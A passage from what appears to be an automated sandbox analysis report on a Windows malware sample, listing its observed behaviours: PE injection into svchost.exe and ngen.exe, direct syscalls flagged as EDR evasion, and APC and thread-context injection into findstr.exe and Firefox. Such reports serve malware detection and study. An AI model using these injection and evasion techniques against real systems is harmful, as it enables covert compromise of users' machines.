            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588208A mov eax, dword ptr fs:[00000030h]4_2_0588208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587D08D mov eax, dword ptr fs:[00000030h]4_2_0587D08D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B909C mov eax, dword ptr fs:[00000030h]4_2_058B909C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AD090 mov eax, dword ptr fs:[00000030h]4_2_058AD090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AD090 mov eax, dword ptr fs:[00000030h]4_2_058AD090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05885096 mov eax, dword ptr fs:[00000030h]4_2_05885096
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059460B8 mov eax, dword ptr fs:[00000030h]4_2_059460B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059460B8 mov ecx, dword ptr fs:[00000030h]4_2_059460B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov ecx, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058970C0 mov eax, dword ptr fs:[00000030h]4_2_058970C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059550D9 mov eax, dword ptr fs:[00000030h]4_2_059550D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059020DE mov eax, dword ptr fs:[00000030h]4_2_059020DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD0C0 mov eax, dword ptr fs:[00000030h]4_2_058FD0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD0C0 mov eax, dword ptr fs:[00000030h]4_2_058FD0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A90DB mov eax, dword ptr fs:[00000030h]4_2_058A90DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058880E9 mov eax, dword ptr fs:[00000030h]4_2_058880E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0587A0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A50E4 mov eax, dword ptr fs:[00000030h]4_2_058A50E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A50E4 mov ecx, dword ptr fs:[00000030h]4_2_058A50E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587C0F0 mov eax, dword ptr fs:[00000030h]4_2_0587C0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058C20F0 mov ecx, dword ptr fs:[00000030h]4_2_058C20F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h]4_2_0589E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h]4_2_0589E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h]4_2_0589E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589E016 mov eax, dword ptr fs:[00000030h]4_2_0589E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587A020 mov eax, dword ptr fs:[00000030h]4_2_0587A020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587C020 mov eax, dword ptr fs:[00000030h]4_2_0587C020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594903E mov eax, dword ptr fs:[00000030h]4_2_0594903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594903E mov eax, dword ptr fs:[00000030h]4_2_0594903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594903E mov eax, dword ptr fs:[00000030h]4_2_0594903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594903E mov eax, dword ptr fs:[00000030h]4_2_0594903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592705E mov ebx, dword ptr fs:[00000030h]4_2_0592705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592705E mov eax, dword ptr fs:[00000030h]4_2_0592705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05882050 mov eax, dword ptr fs:[00000030h]4_2_05882050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AB052 mov eax, dword ptr fs:[00000030h]4_2_058AB052
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05955060 mov eax, dword ptr fs:[00000030h]4_2_05955060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov ecx, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05891070 mov eax, dword ptr fs:[00000030h]4_2_05891070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AC073 mov eax, dword ptr fs:[00000030h]4_2_058AC073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590106E mov eax, dword ptr fs:[00000030h]4_2_0590106E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD070 mov ecx, dword ptr fs:[00000030h]4_2_058FD070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A438F mov eax, dword ptr fs:[00000030h]4_2_058A438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A438F mov eax, dword ptr fs:[00000030h]4_2_058A438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0595539D mov eax, dword ptr fs:[00000030h]4_2_0595539D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587E388 mov eax, dword ptr fs:[00000030h]4_2_0587E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587E388 mov eax, dword ptr fs:[00000030h]4_2_0587E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587E388 mov eax, dword ptr fs:[00000030h]4_2_0587E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05878397 mov eax, dword ptr fs:[00000030h]4_2_05878397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05878397 mov eax, dword ptr fs:[00000030h]4_2_05878397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05878397 mov eax, dword ptr fs:[00000030h]4_2_05878397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058D739A mov eax, dword ptr fs:[00000030h]4_2_058D739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058D739A mov eax, dword ptr fs:[00000030h]4_2_058D739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B33A0 mov eax, dword ptr fs:[00000030h]4_2_058B33A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B33A0 mov eax, dword ptr fs:[00000030h]4_2_058B33A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A33A5 mov eax, dword ptr fs:[00000030h]4_2_058A33A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593B3D0 mov ecx, dword ptr fs:[00000030h]4_2_0593B3D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588A3C0 mov eax, dword ptr fs:[00000030h]4_2_0588A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588A3C0 mov eax, dword ptr fs:[00000030h]4_2_0588A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588A3C0 mov eax, dword ptr fs:[00000030h]4_2_0588A3C0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF658557D00 RtlAddVectoredExceptionHandler,RaiseFailFastException,0_2_00007FF658557D00
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 0_2_00007FF6585B0E9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6585B0E9C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeMemory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 protect: page execute and read and writeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeMemory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: NULL target: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\findstr.exeThread register set: target process: 5328Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\findstr.exeThread APC queued: target process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeMemory written: C:\Windows\System32\svchost.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeMemory written: C:\Windows\System32\svchost.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 5084008Jump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"Jump to behavior
            Source: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215612101.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924750252.00000000014A1000.00000002.00000001.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925092416.0000000001881000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
